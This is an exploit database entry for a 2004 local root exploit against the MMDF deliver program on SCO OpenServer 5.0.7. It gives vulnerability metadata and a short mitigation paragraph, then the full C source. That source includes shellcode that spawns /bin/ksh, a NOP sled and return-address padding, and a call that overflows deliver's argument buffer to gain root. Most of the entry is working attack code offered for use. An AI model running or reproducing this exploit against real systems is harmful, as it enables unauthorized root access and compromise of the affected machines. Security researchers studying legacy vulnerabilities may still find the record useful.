MMDF deliver local root exploit for SCO OpenServer 5.0.7 x86

vendor:

OpenServer

by:

Ramon de Carvalho Valle

7.5

CVSS

HIGH

Local Root Exploit

119

CWE

Product Name: OpenServer

Affected Version From: SCO OpenServer 5.0.7 x86

Affected Version To: SCO OpenServer 5.0.7 x86

Patch Exists: NO

Related CWE:

CPE: o:caldera:openserver:5.0.7

Metasploit:

Other Scripts:

Platforms Tested:

2004

MMDF deliver local root exploit for SCO OpenServer 5.0.7 x86

This exploit is used to gain root access on SCO OpenServer 5.0.7 x86 systems through the MMDF deliver program. It takes advantage of a buffer overflow vulnerability in the program to execute arbitrary shellcode and escalate privileges to root. The exploit code contains a shellcode that pushes specific values onto the stack, sets up the necessary environment for execution, and calls the vulnerable function to trigger the exploit. The exploit was published on milw0rm.com in 2004 by Ramon de Carvalho Valle.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of SCO OpenServer that addresses the buffer overflow vulnerability in the MMDF deliver program. Additionally, restricting access to the vulnerable program and implementing strong access controls can help reduce the risk of exploitation.

Source

Exploit-DB raw data:

/*
 *  MMDF deliver local root exploit for SCO OpenServer 5.0.7 x86
 *  Copyright 2004 Ramon de Carvalho Valle
 *
 */

char shellcode[]=           /*  36 bytes                          */
    "\x68\xff\xf8\xff\x3c"  /*  pushl   $0x3cfff8ff               */
    "\x6a\x65"              /*  pushl   $0x65                     */
    "\x89\xe6"              /*  movl    %esp,%esi                 */
    "\xf7\x56\x04"          /*  notl    0x04(%esi)                */
    "\xf6\x16"              /*  notb    (%esi)                    */
    "\x31\xc0"              /*  xorl    %eax,%eax                 */
    "\x50"                  /*  pushl   %eax                      */
    "\x68""/ksh"            /*  pushl   $0x68736b2f               */
    "\x68""/bin"            /*  pushl   $0x6e69622f               */
    "\x89\xe3"              /*  movl    %esp,%ebx                 */
    "\x50"                  /*  pushl   %eax                      */
    "\x50"                  /*  pushl   %eax                      */
    "\x53"                  /*  pushl   %ebx                      */
    "\xb0\x3b"              /*  movb    $0x3b,%al                 */
    "\xff\xd6"              /*  call    *%esi                     */
;

main(int argc,char **argv) {
    char buffer[16384],address[4],*p;
    int i;

    printf("MMDF deliver local root exploit for SCO OpenServer 5.0.7 x86\n");
    printf("Copyright 2004 Ramon de Carvalho Valle\n\n");

    *((unsigned long *)address)=(unsigned long)buffer-256+5120+4097;

    sprintf(buffer,"-c");
    p=buffer+2;
    for(i=0;i<5120;i++) *p++=address[i%4];
    for(i=0;i<8192;i++) *p++=0x90;
    for(i=0;i<strlen(shellcode);i++) *p++=shellcode[i];
    *p=0;

    execl("/usr/mmdf/bin/deliver","deliver",buffer,0);
}



// milw0rm.com [2004-10-26]